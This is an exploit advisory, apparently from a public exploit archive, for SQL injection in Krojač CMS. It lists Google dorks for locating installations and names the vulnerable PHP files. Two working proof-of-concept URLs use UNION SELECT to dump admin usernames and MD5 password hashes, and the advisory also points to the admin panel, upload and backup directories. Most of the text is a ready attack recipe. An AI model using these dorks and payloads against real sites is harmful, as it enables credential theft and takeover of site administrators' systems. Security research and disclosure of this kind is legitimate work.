# Exploit Title: Krojac(h) CMS SQL Injection Vulnerabilities
# Date (found): 6.2010
# Author: MikiSoft (Email: mihailosoft@gmail.com)
# CMS (Software) Site/Link: http://www.krojac.com
# Versions (affected): All (Edit: In latest version this is fixed now...)

# Google dorks:
intext:"Skrojio i sašio Krojač" ; intext:"Made by Krojač" ; inurl:"/krojacpanel/"

## SQLi Vulnerabilities:

Affected files: myImage.class.php & myOpenFile.php. (Location of that files: /krojacpanel/php/class/myphp/)

SQLi details: Number of columns: 1/2 ; Table: Korisnik ; Columns: username & password (encrypted in MD5) ; Panel (admin): /krojacpanel/

PoC (Proof of Concept):
http://[SITE]/krojacpanel/php/class/myphp/myImage.class.php?ID=99999+union+all+select+group_concat(username,0x3a,password)+from+Korisnik--
http://[SITE]/krojacpanel/php/class/myphp/myOpenFile.php?IDFajl=99999+union+all+select+group_concat(username,0x3a,password),2+from+Korisnik--

Btw. Here is location of uploaded files/documents (not always): /krojacpanel/UploadedFiles/ , and /krojacpanel/documents/ ; and location of backup folder: /krojacpanel/Backup/

###END###
##P.S. If you have any questions, comments, or concerns, feel free to contact me.